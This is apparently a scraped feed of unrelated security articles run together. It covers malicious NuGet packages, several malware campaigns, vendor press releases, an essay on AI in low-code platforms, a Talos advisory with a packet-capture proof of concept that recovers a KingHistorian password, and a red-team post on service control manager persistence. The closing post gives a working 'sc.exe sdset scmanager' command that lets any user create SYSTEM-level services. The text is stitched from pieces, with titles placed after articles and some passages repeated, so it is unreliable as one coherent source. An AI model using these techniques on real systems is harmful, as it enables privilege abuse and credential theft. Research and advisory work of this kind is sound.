In a possible first for the NuGet repository, more than a dozen components in the .NET code repository run a malicious script upon installation, with no warning or alert.

A baker's dozen of packages hosted on the NuGet repository for .NET software developers are actually malicious Trojan components that will compromise the installation system and download crypto-stealing malware with backdoor functionality.

Software supply chain security firm JFrog stated in an analysis published March 21 that the 13 packages, which have since been removed, have been downloaded more than 166,000 times and impersonate other legitimate software, such as Coinbase and Microsoft ASP.NET. JFrog detected the attack when the company's researchers noted suspicious activity when a file — init.ps1 — executed upon installation and then downloaded an executable file and ran it.

The discovery of the malicious code highlights that attackers are further branching out into the software supply chain as a way to compromise unwary developers, even though .NET and the C# programming languages are lesser known among attackers, says Shachar Menashe, director of security research for JFrog.

"The techniques to get malicious code executed on NuGet package install, while trivial, are less documented than in Python or JavaScript, and some of them have been deprecated, so some novice attackers may think it's not possible," he says. "And perhaps NuGet has better automated filtering of malicious packages."

The software supply chain has become increasingly targeted by attackers with attempts to compromise developers' systems or propagate unnoticed code to the end user through developers' applications. The Python Package Index (PyPI) and the JavaScript-focused Node Package Manager (npm) ecosystems are frequent targets of supply chain attacks targeting open source projects.

The attack on the .NET software ecosystem, which consists of nearly 350,000 unique packages, is the first time that malicious packages have targeted NuGet, according to JFrog, although the company noted that a spamming campaign had previously pushed phishing links to developers.

**Typosquatting Still a Problem**

The attack underscores that typosquatting continues to be a problem. That style of attack involves creating packages with similar sounding names — or the same name with common spelling errors — as legitimate ones, in the hopes that a user will mistype a common package or won't notice the errors.

Developers should give new packages a good look before including them in a programming project, JFrog researchers Natan Nehorai and Brian Moussalli wrote in the online advisory.

"Even though no prior malicious-code attacks were observed in the NuGet repository, we were able to find evidence for at least one recent campaign using methods such as typosquatting to propagate malicious code," they wrote. "As with other repositories, safety measures should be taken at every step of the software development lifecycle to ensure the software supply chain remains secure."

**Immediate Code Execution Is Problematic**

Files that are automatically executed by development tools are a security weakness and should be eliminated or limited to reduce the attack surface area, the researchers stated. That functionality is a significant reason why the npm and PyPI ecosystems have poisoning issues, as compared to, say, the Go package ecosystem.

"Despite the fact that the discovered malicious packages have since been removed from NuGet, .NET developers are still at high risk from malicious code since NuGet packages still contain facilities to run code immediately upon package installation," the JFrog researchers stated in the blog post. "\[A\]lthough it is deprecated, \[an initialization\] script is still honored by Visual Studio and will run without any warning when installing a NuGet package."

JFrog advised developers to check for typos in imported and installed packages and said that developers should make sure not to "accidentally install them in their project, or mention them as a dependency," the company stated.

In addition, developers should view the contents of packages to ensure that there are no executable files that are being downloaded and automatically executed. While such files are common in some software ecosystems, they are usually an indication of malicious intent.

Through a variety of countermeasures, the NuGet repository — as well as npm and PyPI — are slowly, but surely, eliminating the security weaknesses, says JFrog's Menashe. 

"I don't expect NuGet to become more of a target in the future, especially if the NuGet maintainers were to fully remove support for running code on package install — which they have already partially done," he says.

.NET Devs Targeted With Malicious NuGet Packages

Global study reveals boards still undervalue cyber's role.

**DALLAS****,** **March 21, 2023** **/PRNewswire/ --** Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, today released new research\* revealing that while global organizations plan to increase cybersecurity budgets in 2023, business leaders hold conflicting views on the function.

**To read a full copy of the report,** _Risky Rewards_**, please visit:** https://www.trendmicro.com/explore/risk-reward2023/2031-tl-en-rpt#page=1

Jon Clay**, VP of threat intelligence at Trend Micro:** "If organizations want to make the most of their security investments, business leaders must reframe their view of cybersecurity – to think more broadly about how it can positively impact the enterprise. This research shows it's clearly a critical component of winning new business and talent. At a time when every dollar/penny counts, it's concerning to see stereotyped views of security persist at the very top."

Nearly two-thirds (64%) of business decision-maker (BDM) respondents say they plan to increase security investment in 2023.

However, the research also reveals critical gaps in BDMs' understanding of the relationship between cybersecurity and other parts of the organization.

On the one hand, half (51%) claim cybersecurity is a necessary cost but not a revenue contributor, while a similar share (48%) argue that its value is limited to attack/threat prevention. Nearly a fifth (38%) even see security as a barrier rather than a business enabler.

However, on the other hand, 81% worry that a lack of cybersecurity credentials could impact their ability to win new business – with a fifth (19%) admitting it already has. This comes as nearly three-quarters (71%) of BDMs admit they're being asked about security posture in negotiations with prospects and suppliers. And 78% say these requests for information are increasing in frequency.

This apparent contradiction in attitudes is laid bare by another finding. Despite prospects and suppliers clearly prioritizing security in negotiations, only 57% of BDMs perceive there to be a strong or very strong connection between cyber and client acquisition/satisfaction.

Talent acquisition is another area where there are clear gaps in BDMs' understanding of the interconnectivity between cybersecurity and the rest of the business.

Nearly three-quarters (71%) of respondents claim that the ability to work from anywhere has become vital in the battle for talent. Yet only around two-fifths understand the strong connection between cybersecurity and employee retention (42%) and talent attraction (43%).

That's despite respondents recognizing the impact of cyber on the employee experience:

*   83% say current security policies have affected remote employees' ability to do their jobs (eg. network and information access issues, and slowing the pace of work)
*   43% say current security policies place restrictions on employees' ability to work from anywhere
*   54% say current policies restrict what devices/platforms employees can choose to use

_\* Trend Micro commissioned Sapio Research to poll 2718 business decision-makers in companies with 250+ employees across 26 countries._ 

**About Trend Micro**

Trend Micro, a global cybersecurity leader, helps make the world safe for exchanging digital information. Fueled by decades of security expertise, global threat research, and continuous innovation, Trend Micro's cybersecurity platform protects hundreds of thousands of organizations and millions of individuals across clouds, networks, devices, and endpoints. As a leader in cloud and enterprise cybersecurity, the platform delivers a powerful range of advanced threat defense techniques optimized for environments like AWS, Microsoft, and Google, and central visibility for better, faster detection and response. With 7,000 employees across 65 countries, Trend Micro enables organizations to simplify and secure their connected world. www.TrendMicro.com.  

SOURCE Trend Micro Incorporated

Research Highlights Cyber Security's Underestimated Role As a Business and Revenue Enabler

**SAN FRANCISCO****,** **March 21, 2023** **/PRNewswire/ --** Normalyze, a pioneering provider of cloud data security solutions, was granted the most fundamental patent to date for Data Security Posture Management (DSPM) by the U.S. Patent and Trademark Office. The patent addresses cloud data attack path detection based on security posture of the cloud environment and resource network path tracing. This patent is foundational for an emerging data-first approach to secure cloud-resident sensitive data and its implications will help to innovate the enterprise cybersecurity market at large.

Patent #11,575,696 describes how an accurate measure of cloud security posture enables the Normalyze DSPM platform to automatically trace network paths at scale between cloud-resident sensitive data and all points of access to determine attack paths. Paths are dynamically displayed to IT, security, and compliance teams, which instantly identify authorized versus unauthorized access – including propagation of breach attacks. Automated remediation workflows ensure continuous safety and compliance of the sensitive data. The Normalyze patent details how its technology, via integration, improves systems and methods of separate siloed tools such as cloud security posture management (CSPM), cloud infrastructure entitlement management (CIEM), cloud-native application protection platform (CNAPP), and/or cloud-native configuration management databases (CMDB).

"This patent's technology enables the Normalyze platform with 360-degree visibility of where our data resides across our cloud environments and any associated risks," said Rahul Gupta, Head of Information Security and GRC at Sigma Computing. "Normalyze's ability to connect the dots around data – including accesses, identities, vulnerabilities, and configurations – helps us understand where the real threats are and remediate them in near real-time. It is a game changer for securing our cloud environments."

"This patent is the first and the most important in the DSPM space. Its technology connects the risks to sensitive data in customer cloud environments, allowing them to focus on what matters most instead of chasing thousands of alerts generated by other siloed products," said Ravi Ithal, CTO and cofounder of Normalyze. "Getting the first major patent for an emerging new category such as DSPM shows our thought leadership in helping customers protect their most valuable asset, which is their data."

Read more detail about the patent from Ravi Ithal in this blog post. Normalyze has additional patents pending and will be announcing them in the first half of 2023.

The Normalyze platform is generally available in full functionality and supports all major IaaS and PaaS cloud services such as AWS, Google Cloud, Microsoft Azure and Snowflake.

**About Normalyze:**

Normalyze is a pioneering provider of cloud data security solutions helping customers secure their data, applications, identities, and infrastructure across public clouds. With Normalyze, organizations can discover and visualize their cloud data attack surface within minutes and get real-time visibility and control into their security posture, including access, configurations, and sensitive data to secure cloud infrastructures at scale. The Normalyze patented and agentless scanning platform continuously discovers resources, sensitive data and access paths across all cloud environments. The company was founded by industry veterans 

Ravi Ithal and Amer Deeba and has several customers, including Chargepoint, Corelight,

 Fairfield, Ginkgo Bio, Netskope, Sigma Computing and others. The company is funded by Lightspeed Venture Partners and Battery Ventures.

For more information, please visit normalyze.ai

SOURCE Normalyze

Normalyze Granted Patent for Data Security Posture Management (DSPM)

Amid the ongoing war between Russia and Ukraine, government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea have been attacked as part of an active campaign that drops a previously unseen, modular framework dubbed CommonMagic.
"Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar

Amid the ongoing war between Russia and Ukraine, government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea have been attacked as part of an active campaign that drops a previously unseen, modular framework dubbed **CommonMagic**.

"Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods," Kaspersky said in a new report.

The Russian cybersecurity company, which detected the attacks in October 2022, is tracking the activity cluster under the name "Bad Magic."

Attack chains entail the use of booby-trapped URLS pointing to a ZIP archive hosted on a malicious web server. The file, when opened, contains a decoy document and a malicious LNK file that culminates in the deployment of a backdoor named PowerMagic.

Written in PowerShell, PowerMagic establishes contact with a remote server and executes arbitrary commands, the results of which are exfiltrated to cloud services like Dropbox and Microsoft OneDrive.

PowerMagic also serves as a conduit to deliver the CommonMagic framework, a set of executable modules that are designed to carry out specific tasks such as interacting with the command-and-control (C2) server, encrypting and decrypting C2 traffic, and executing plugins.

Two of the plugins discovered so far come with capabilities to capture screenshots every three seconds and gather files of interest from connected USB devices.

Kaspersky said it found no evidence linking the operation and its tooling to any known threat actor or group.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New 'Bad Magic' Cyber Threat Disrupt Ukraine's Key Sectors Amid War

Threat actors are using legitimate network assets and open source code to fly under the radar in data-stealing attacks using a set of custom malware bent on evasion.

A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia.

According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments. But Naplistener — along with other new types of malware used by the group —appear "designed to evade network-based forms of detection," says Jake King, Elastic Security's director of engineering.

So, don't sleep on that defense-in-depth strategy.

Researchers observed Naplistener in the form of a new executable that was created and installed on a victim network as a Windows Service on Jan. 20. Threat actors created the executable, Wmdtc.exe, using a naming convention similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service.

**A Focus on Detection Evasion**

Naplistener is the latest in a series of new types of custom malware that Elastic researchers have observed REF2924 using in its attacks that support a particular focus on evading network-based detection, King says. What these new malware families all have in common is not only that they are based on open source technologies but also that they use familiar and legitimate network assets to mask their activities.

"A consistent theme to all these capabilities is the intention to hide in legitimate and expected forms of network communication, and \[they\] are installed to resemble the underlying services they abuse," King notes.

While other threat groups also adopt these approaches with custom malware, they do so "less often, and less consistently" than REF2924, he notes, demonstrating that REF2924 is betting heavily on avoiding detection for success.

"A unique observation of this threat actor is in the deep focus of evasion tactics," King says. "While many threats masquerade in similar ways, this threat pursues the methodology to an extreme and consistently uses these methodologies."

**Custom Malware at a Glance**

In addition to Naplistener, which mimics the behavior of Web servers on a network to hide itself, REF2924 also is wielding custom malware that Elastic Security tracks as SiestaGraph and Somnirecord, among others. The former is notable for using Microsoft cloud resources for command and control to evade detection, and the latter masquerades as DNS protocol traffic, King says.

"Organizations in the observed regions of impact who rely strictly on network-based methods of detection will struggle to identify these malware families," he adds.

Specifically, Naplistener creates an HTTP request listener that can process incoming requests from the Internet, read any data that was submitted, decode it from Base64 format, and execute it in memory, the researchers said.

As mentioned, it evades victims' attempts at network-based detection by behaving similarly to Web servers, operating between legitimate Web users and resembling normal Web traffic. It does this all without generating Web server log events, the researchers said.

Naplistener also relies on code present in public repositories for a variety of purposes, and it appears that REF2924 may be developing additional prototypes and production-quality code from open sources, they added.

**Going Beyond Network-Level Detection**

Because REF2024 is so focused on avoiding network-based detection methods, enterprises in its crosshairs can avoid compromise by the group primarily by prioritizing endpoint-based detection technologies, more commonly known as endpoint detection and response (EDR), King says.

Indeed, while EDR is not a new security strategy for many organizations in the US, in the region of the world where the group is operating, it is still in early stages of adoption, he says. This exposes these organizations to risk from the custom malware that the group is deploying.

"Organizations which rely on network technologies to detect threats will face significant challenges, and those are compounded relative to the complexity of their networks," King says. "In short: The more connections and types of connections, the harder it is for organizations to monitor them effectively; this is relatively quickly addressed with another host-based form of visibility."

Another technology that organizations can deploy to combat malware that can evade network-based detection is egress filtering, or limiting the kinds of outbound network communications they permit, King says.

However, he adds, "this is not a particularly scalable approach once an organization reaches a significant size, due to the large number of egress points they manage and the diversity of legitimate communication methods."

Custom 'Naplistener' Malware a Nightmare for Network-Based Detection

Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of malware called ShellBot.
"ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC) said in a report.
ShellBot is installed on servers that

Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of a malware called ShellBot.

"ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC) said in a report.

ShellBot is installed on servers that have weak credentials, but only after threat actors make use of scanner malware to identify systems that have SSH port 22 open.

A list of known SSH credentials is used to initiate a dictionary attack to breach the server and deploy the payload, after which it uses the Internet Relay Chat (IRC) protocol to communicate with a remote server.

This encompasses the ability to receive commands that allows ShellBot to carry out DDoS attacks and exfiltrate harvested information.

ASEC said it identified three different ShellBot versions – LiGhT's Modded perlbot v2, DDoS PBot v2.0, and PowerBots (C) GohacK – the first two of which offer a variety of DDoS attack commands using HTTP, TCP, and UDP protocols.

PowerBots, on the other hand, comes with more backdoor-like capabilities to grant reverse shell access and upload arbitrary files from the compromised host.

The findings come nearly three months after ShellBot was employed in attacks aimed at Linux servers that also distributed cryptocurrency miners via a shell script compiler.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor," ASEC said. "Moreover, the threat actor could use various other backdoor features to install additional malware or launch different types of attacks from the compromised server."

The development also comes as Microsoft revealed a gradual increase in the number of DDoS attacks targeting healthcare organizations hosted in Azure, surging from 10-20 attacks in November 2022 to 40-60 attacks daily in February 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New ShellBot DDoS Malware Targeting Poorly Managed Linux Servers

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.
While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.
The

Cyber Threat Intel / Vulnerability

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.

While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.

The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types.

Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days.

Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.

Much of the exploitation has focused on vulnerabilities in edge network devices such as firewalls for obtaining initial access. Various China-nexus clusters have also been spotted leveraging a flaw in Microsoft Diagnostics Tool (aka Follina) as part of disparate campaigns.

"Multiple separate campaigns may indicate that the zero-day was distributed to multiple suspected Chinese espionage clusters via a digital quartermaster," Mandiant said, adding it points to the "existence of a shared development and logistics infrastructure and possibly a centralized coordinating entity."

North Korean and Russian threat actors, on the other hand, have been linked to the exploitation of two zero-days each. This includes CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397.

The disclosure comes as threat actors are also getting better at turning newly disclosed vulnerabilities into powerful exploits for breaching a wide range of targets across the world.

"While the discovery of zero-day vulnerabilities is a resource-intensive endeavor and successful exploitation is not guaranteed, the total number of vulnerabilities disclosed and exploited has continued to grow, the types of targeted software, including Internet of Things (IoT) devices and cloud solutions, continue to evolve, and the variety of actors exploiting them has expanded," Mandiant said.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The Mandiant report also follows a warning from Microsoft's Digital Threat Analysis Center about Russia's persistent kinetic and cyber targeting as the war in Ukraine continues into the second year.

The tech giant said since January 2023 it has observed "Russian cyber threat activity adjusting to boost destructive and intelligence gathering capacity on Ukraine and its partners' civilian and military assets."

It further warned of a possible "renewed destructive campaign" mounted by the nation-state group known as Sandworm (aka Iridium) on organizations located in Ukraine and elsewhere.

What's more, Moscow-backed hackers have deployed at least two ransomware and nine wiper families against over 100 Ukrainian entities. No less than 17 European countries have been targeted in espionage campaigns between January and mid-February 2023, and 74 countries have been targeted since the start of the war.

Other key traits associated with Russian threat activity include the use of ransomware as weapons of cyber sabotage, gaining initial access through diverse methods, and leveraging real and pseudo hacktivist groups to expand the reach of Moscow's cyber presence.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**SUMMARY**

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-200 - Information Exposure

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

The protocol used to communicate with XDBServer uses a mixture of ciphering and compression, which prevents plaintext strings from being sent directly. However, if an attacker captured an authentication packet, all the necessary information is included in the packet to recover the username and password.

Packets contain a 0x14-byte header starting with ‘SORB’ in ASCII as magic bytes. The rest of this header is uninteresting for this attack. Once the 0x14 bytes are skipped over, the packet’s first byte of data contains a flag to display if it is compressed, with the least-significant bit of the first byte representing the compression flag. If the packet is compressed, it is decompressed with quicklz . Once decompressed, the data can be recovered using length and value encoding to recover a structure as follows:

    pub struct BrkConnectionOption {
        username: String,
        ciphered_password: String,
        application_name: String,
        client_name: String,
        callback_proxy: String,
        collector_name: String,
        network_timeout: i32,
        connection_flags: i32,
        reserved_1: i32,
        reserved_2: i32,
        session_id: String,
        reserved_4: String,
        enc_key_1: i32,
        enc_key_2: i32,
        enc_key_3: i32,
        enc_key_4: i32,
        os_version: String,
        protocol_version: i32,
        system_general_1: i32,
        system_general_2: i32,
        system_general_3: i32,
        system_general_4: i32, 
    }
    

By combining the parts of the enc_key, it is possible to decipher the ciphered_password from the packet back into the plaintext form.

**Exploit Proof of Concept**

    Raw packet data : [83, 79, 82, 66, 2, 1, 70, 1, 19, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 82, 0, 0, 0, 0, 0, 71, 247, 1, 0, 0, 92, 2, 0, 0, 0, 0, 0, 128, 0, 86, 0, 0, 0, 8, 75, 0, 82, 0, 84, 0, 68, 0, 66, 0, 65, 0, 80, 0, 73, 0, 16, 66, 0, 114, 0, 107, 0, 83, 0, 10, 8, 130, 128, 101, 113, 32, 118, 99, 80, 67, 0, 111, 0, 110, 0, 110, 97, 80, 99, 0, 116, 0, 7, 226, 99, 119, 0, 85, 0, 115, 97, 80, 114, 0, 80, 50, 0, 55, 0, 4, 64, 85, 145, 53, 0, 34, 52, 48, 0, 48, 0, 57, 0, 54, 0, 49, 0, 56, 65, 32, 51, 49, 144, 49, 65, 16, 69, 49, 128, 67, 49, 96, 65, 49, 96, 51, 0, 67, 49, 128, 68, 0, 130, 85, 181, 210, 51, 65, 32, 54, 0, 52, 0, 70, 65, 48, 50, 60, 70, 65, 32, 57, 65, 48, 65, 49, 16, 57, 49, 112, 57, 49, 0, 56, 49, 48, 82, 60, 55, 49, 96, 68, 65, 96, 51, 0, 82, 60, 51, 51, 0, 106, 85, 75, 197, 48, 65, 96, 50, 65, 80, 54, 65, 16, 130, 65, 68, 65, 16, 66, 65, 64, 67, 49, 0, 49, 49, 96, 52, 49, 80, 34, 64, 55, 65, 64, 15, 75, 65, 64, 66, 81, 48, 121, 113, 48, 77, 0, 103, 113, 64, 130, 84, 69, 145, 83, 113, 64, 117, 0, 100, 0, 105, 97, 240, 11, 77, 81, 48, 69, 65, 64, 71, 65, 80, 87, 65, 144, 78, 49, 16, 48, 0, 78, 184, 86, 67, 65, 32, 75, 0, 45, 49, 64, 98, 0, 170, 90, 85, 145, 102, 49, 96, 53, 49, 96, 98, 49, 16, 45, 49, 80, 48, 97, 64, 97, 35, 208, 50, 58, 51, 33, 208, 97, 49, 64, 49, 49, 32, 45, 97, 64, 98, 49, 144, 54, 49, 32, 97, 0, 97, 49, 112, 54, 0, 40, 168, 168, 234, 99, 0, 98, 49, 128, 58, 113, 64, 99, 0, 112, 0, 32, 33, 208, 104, 33, 0, 49, 49, 144, 50, 0, 46, 49, 16, 54, 49, 128, 46, 49, 0, 46, 49, 112, 49, 33, 0, 45, 115, 0, 82, 53, 214, 6, 0, 160, 55, 49, 144, 2, 47, 116, 33, 0, 48, 1, 0, 1, 0, 2, 1, 0, 8, 0, 46, 1, 79, 64, 6, 0, 58, 92, 90, 127, 4, 12, 117, 19, 28, 39, 51, 77, 97, 144, 99, 69, 20, 85, 237, 113, 32, 111, 113, 48, 111, 0, 102, 113, 64, 32, 0, 87, 97, 144, 110, 97, 64, 111, 0, 119, 113, 48, 32, 81, 80, 110, 97, 176, 110, 97, 240, 119, 97, 224, 32, 65, 80, 66, 111, 116, 97, 144, 242, 104, 160, 170, 2, 134, 44, 0, 32, 0, 40, 49, 96, 46, 49, 96, 32, 97, 32, 117, 97, 144, 108, 97, 64, 32, 49, 144, 50, 49, 0, 48, 0, 41, 0, 0, 80, 3, 8, 0, 5, 0, 0, 0, 0, 0]
    
    BrkConnectionOption {
        username: "newUser",
        ciphered_password: "27527009618B391AE8C6A63C8D3B64FCC8FB9CA1979083E876DF3E83080F2E6A8BDABDC01645BD7D",
        application_name: "KDBSysMgtStudio",
        client_name: "MSEDGEWIN10",
        callback_proxy: "KRTDBCBK-4bf656b1-50da-4393-a412-db962aa76cb8:tcp -h 192.168.0.71 -p 5679 -t 0",
        collector_name: "",
        network_timeout: 0,
        connection_flags: 2,
        reserved_1: 0,
        reserved_2: 0,
        session_id: "",
        reserved_4: "",
        enc_key_1: 1078919470,
        enc_key_2: 1547304966,
        enc_key_3: 201621338,
        enc_key_4: 656151413,
        os_version: "Microsoft Windows Unknown Edition, (6.6 build 9200)",
        protocol_version: 217088,
        system_general_1: 0,
        system_general_2: 0,
        system_general_3: 0,
        system_general_4: 0,
        encryption_key: EncryptionKey {
            enc_1: 1078919470,
            enc_2: 1547304966,
            enc_3: 201621338,
            enc_4: 656151413,
        },
    }
    
    Password is : Thisismypassword
    

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

CVE-2022-45124: TALOS-2022-1683 || Cisco Talos Intelligence Group

No-code has lowered the barrier for non-developers to create applications. AI will completely eliminate it.

Since ChatGPT captured our imaginations, people have been contemplating its pending impact on the business world. This week, these thoughts became a reality, with Google and Microsoft embedding AI features into their business productivity suites.

Microsoft took another major step by releasing AI Copilot for Power Apps, Microsoft's low-code platform. Power Apps can connect far and beyond the Microsoft ecosystem, with almost a thousand built-in connectors to everything from Salesforce to on-prem and AWS. With one swift move, AI has been integrated into the day-to-day workflows of the world's largest organizations.

This is an amazing achievement, and other low-code/no-code platforms will surely try to catch up quickly. But ask yourself: Who will make the decision to integrate data with AI? Who will grant access? The answer: Every business user, and you won't even know, since they'll let AI impersonate their accounts.

**AI + Low-Code/No-Code = A Perfect Storm**

In recent years, low-code/no-code has given business users newfound freedom. They were granted developer-level power that enabled them to customize their digital experience, with the technical skills they already have rather than having to learn new ones. Business users have started building applications that solve the problems that hurt most, on top of their day-to-day business data, without relying on IT or waiting for resources. After just a few years of low-code/no-code, many enterprises find themselves with tens or hundreds of thousands of applications, built outside of IT with no oversight or control.

Forget about CI/CD or security reviews, most of these applications follow the "push save to deploy to production" model instead. Quickly and quietly, applications developed outside of IT without SDLC have become a significant portion of enterprise business applications. This has already become a major concern for enterprise security.

Enter AI. Imagine that every conversation you had with ChatGPT involved you giving it access to business data, and left behind a nice little application you could play around with and share with others. Got a long business email? Let AI shorten it for you. Need to find relevant customers in your CRM? Let AI generate statistics for you. Need to analyze user behavior over product telemetry? Let AI query the database for you. Don't stop there! Create mini-applications to allow answering those questions repeatedly, and share them with your coworkers! Every application requires access — your access. Low-code has lowered the barrier for non-developers to create applications. AI, however, will completely eliminate it.

Low-code/no-code provides ease-of-connectivity to business data by removing the difficult hurdles around authentication, and provides a host of widgets business users can combine creatively to address their needs. AI brings power to everyone, allowing them to create by simply asking for what they want. The two techniques fit together like a glove and a hand. Superpowered by AI, low-code/no-code expands from "everyone can build an application" to "everyone builds an application, for everything they think of, all of the time."

**You Are Not in Control**

Who decides what data the AI can access? You might be thinking this would be IT, or the security team, but you would be wrong. Business users are making those decisions. But how?

Imagine a scenario where every business user in a large enterprise starts to build their own applications. Setting aside the skill gap, the No. 1 hurdle to progress would be identity and access. Provisioning an application identity and granting the right permissions to it would require approval, which would trigger questions and perhaps even a security review. You won't get to tens of thousands of applications in a large enterprise this way.

To circumvent this hurdle, low-code/no-code platforms made a significant compromise: Applications can — and mostly do — impersonate users rather than have their own identities. This completely negates the permission issue. As a low-code/no-code developer, I can embed my own identity within my newly created application. I can even share my credentials with others, so they'll be able to build their own applications with my access to data or performing operations on my behalf. No more waiting for approval — we have a green light to create!

The problem with this credentials-sharing-as-a-service is that it completely negates the enterprise permission model. If users are sharing their credentials with each other, there's no easy way to distinguish them. Moreover, an application can leverage credentials across your organizational boundary — say, an employee's personal email account — in combination with a business account. To add a cherry on top, moving data between one account and the other is done by automated copy-and-paste on the low-code/no-code platform's cloud. No data gets transmitted, so there is no opportunity to block data leaking out.

Credential sharing and data leakage have been a major issue with low-code/no-code applications. AI doesn't change that, but it magnifies the scale of the problem. When AI is plugged into a low-code/no-code platform, the AI gains potential access to everything the platform can access. The transition between potential and in-practice access is up to whoever prompts the AI to build a low-code/no-code application for them. We are trusting our business users with making the right choice without any guardrails or guidance.

**Business Users Build Enterprise Applications**

More than a specific technology, low-code/no-code is an idea — a strong push into IT decentralization and business empowerment. It has already brought tremendous productivity benefits to the world's largest organizations, because the employees who know best how to impact the business are the business users.

For professionals in IT and security, this is a paradigm shift. No longer can we rely on the security savviness of developers or official security mandates. We must embrace business users and help guide them in the right direction. If we fail to do so, the forces of productivity and data-hungry AI will surely be glad to do that for us.

AI Has Your Business Data

The service control manager (SCM) is responsible to start and stop services in windows environments including device drivers and start up applications. Microsoft introduced in… 
Continue reading → Persistence – Service Control Manager

The service control manager (SCM) is responsible to start and stop services in windows environments including device drivers and start up applications. Microsoft introduced in Windows 2000 and later the Security Descriptor Definition Language (SDDL) in order to provide a textual representation for security descriptors in a more readable format. Prior to Windows 2000 security descriptors were represented as hex bytes. Permissions of the service control manager like other windows objects are managed by Discretionary Access Control List (DACL) which are also represent by SDDL.

During red team operations if elevated access has been achieved the permissions of the service control manager can be modified via the SDDL in order to grant the “Everyone” group with rights over the service control manager. This action could be used as a form of persistence since any user could create a service on the environment that will execute an arbitrary command or payload with SYSTEM level privileges every time that the computer starts. The technique was discovered by Grzegorz Tworek and was shared over Twitter.

Execution of the command below will retrieve quickly the SDDL rights of the service control manager utility.

    sc sdshow scmanager

Service Control Manager – Security Descriptor

PowerShell could also be used to enumerate SDDL rights for all the user groups and convert them to a readable format.

$SD = Get-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\Schedule\\Security\\
$sddl = (\[wmiclass\]”Win32\_SecurityDescriptorHelper”).BinarySDToSDDL($SD.Security).Sddl
$SecurityDescriptor = ConvertFrom-SddlString -Sddl $sddl
$SecurityDescriptor.DiscretionaryAcl

Enumerate Permissions via PowerShell

The command below will enumerate the permissions of the “_scmanager_” utility and will display the associated SDDL rights.

    sc sdshow scmanager showrights

Service Control Manager – Rights Enumeration

Users with standard level access they cannot create a service in Windows environments. This privilege belongs only to elevated users such as Local Administrators. However, modification of the security descriptor permissions for the service control manager could allow also any user to create a service that will run under the context of the SYSTEM account. Using the security descriptor definition language these permissions could be modified by executing the command below:

    sc.exe sdset scmanager D:(A;;KA;;;WD)

Security Descriptor Permission Modification

The following table displays what the SDDL acronyms mean in the above command.

D

Discretionary Access Control List

A

Access Control Entry – Access Allowed

KA

KEY\_ALL\_ACCESS – Rights

WD

Security Principal of Everyone Group

